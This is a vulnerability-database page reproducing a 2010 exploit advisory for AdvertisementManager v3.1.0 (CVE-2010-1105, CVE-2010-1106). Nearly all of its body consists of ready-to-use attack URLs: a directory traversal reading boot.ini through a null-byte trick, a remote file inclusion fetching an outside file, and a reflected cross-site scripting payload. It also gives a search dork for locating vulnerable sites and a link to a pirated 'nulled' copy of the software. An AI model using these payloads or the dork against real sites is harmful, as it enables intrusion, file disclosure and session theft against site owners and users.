Index
Bugtraq
Pełna lista
Błędy
Sztuczki
Exploity
Dorks list
Tylko z CVE
Tylko z CWE
Bogus
Ranking
CVEMAP
Świeża lista CVE
Producenci
Produkty
Słownik CWE
Sprawdź nr. CVE
Sprawdź nr. CWE
Szukaj
W Bugtraq
W bazie CVE
Po autorze
Po nr. CVE
Po nr. CWE
Po producencie
Po produkcie
RSS
Bugtraq
CVEMAP
CVE Produkty
Tylko Błędy
Tylko Exploity
Tylko Dorks
Więcej
cIFrex
Facebook
Twitter
Donate
O bazie
Lang
Polish
English
Submit
AdvertisementManager v3.1.0 Multti Vulnerability
2010.03.26
Credit:
indoushka
Risk:
High
Local:
No
Remote:
Yes
CVE:
CVE-2010-1105
|
CVE-2010-1106
CWE:
CWE-79
CWE-94
======================================================================================== | # Title : AdvertisementManager v3.1.0 Multti Vulnerability | # Author : indoushka | # email : indoushka@hotmail.com | # Home : www.iq-ty.com/vb | # Script Home : http://www.ziddu.com/download/7950525/advertisement-manager-v3.1.0-php-nulled.rar.html | # Dork : AdvertisementManager v3.1.0 (Copyright © 2000-2004 AdvertisementManager.com. All rights reserved. ) | # Tested on : windows SP2 Franais V.(Pnx2 2.0) + Lunix Franais v.(9.4 Ubuntu) | # Bug : Mullti ====================== Exploit By indoushka ================================= # Exploit : 1- Directory traversal (Windows) http://127.0.0.1/Advertisement/cgi/index.php?usr=indoushka&passw=indoushka&savelogin=on&admin=Enter&req=../../../../../../../../boot.ini%00 2- File inclusion http://127.0.0.1/Advertisement/cgi/index.php?usr=indoushka&passw=indoushka&savelogin=on&admin=Enter&req=http://127.0.0.1/c.txt? 3- XSS http://127.0.0.1/Advertisement/cgi/index.php?usr=%00'"><ScRiPt%20%0a%0d>alert(213771818860)%3B</ScRiPt>&passw=indoushka&savelogin=off&admin=Cancel&req=admin_login ================================ Dz-Ghost Team ======================================================== Greetz : Ñ æ Ï ÈÈ 22 + ãÑ + ÊÑÊ + Ì + ã + Êã + ÏÑæã + ãÛ + æÌÏ + ÃÛÏÑ + æã + æåÑ Exploit-db Team (loneferret+Exploits+dookie2000ca) all my friend * Dos-Dz * Snakespc * His0k4 * Hussin-X * Str0ke * Saoucha * Star08 * www.hackteach.org Rafik (Tinjah.com) * Yashar (sc0rpion.ir) * Silitoad * redda * mourad (dgsn.dz) * www.cyber-mirror.org www.forums.ibb7.com * www.owned-m.com *Stake (v4-team.com) * www.dev-chat.com * Cyb3r IntRue (avengers team) * www.securityreason.com * www.packetstormsecurity.org * www.best-sec.net * www.zone-h.net * www.m-y.cc * www.hacker.ps * no-exploit.com * www.bug-blog.de * www.bawassil.com * www.host4ll.com * www.xp10.me www.forums.soqor.net * www.alkrsan.net * blackc0der (www.forum.aria-security.com) * www.kadmiwe.net SoldierOfAllah (www.m4r0c-s3curity.cc) * www.arhack.net * www.google.com * www.sec-eviles.com www.mriraq.com * www.dzh4cker.l9l.org * www.goyelang.cn * www.arabic-m.com * www.securitywall.org r1z (www.sec-r1z.com) * www.zac003.persiangig.ir * www.0xblackhat.ir * www.mormoroth.net ------------------------------------------------------------------------------------------------------------
Referencje:
http://xforce.iss.net/xforce/xfdb/55756
http://www.packetstormsecurity.com/1001-exploits/advertisemanager-xssrfitraversal.txt
See this note in RAW Version
Tweet
Vote for this issue:
0
0
50%
50%
Thanks for you vote!
Thanks for you comment!
Your message is in quarantine 48 hours.
Comment it here.
Nick (*)
Email (*)
Video
Text (*)
(*) -
required fields.
Cancel
Submit
{{ x.nick }}
|
Date:
{{ x.ux * 1000 | date:'yyyy-MM-dd' }}
{{ x.ux * 1000 | date:'HH:mm' }}
CET+1
{{ x.comment }}
Show all comments
Copyright
2024
, cxsecurity.com
Back to Top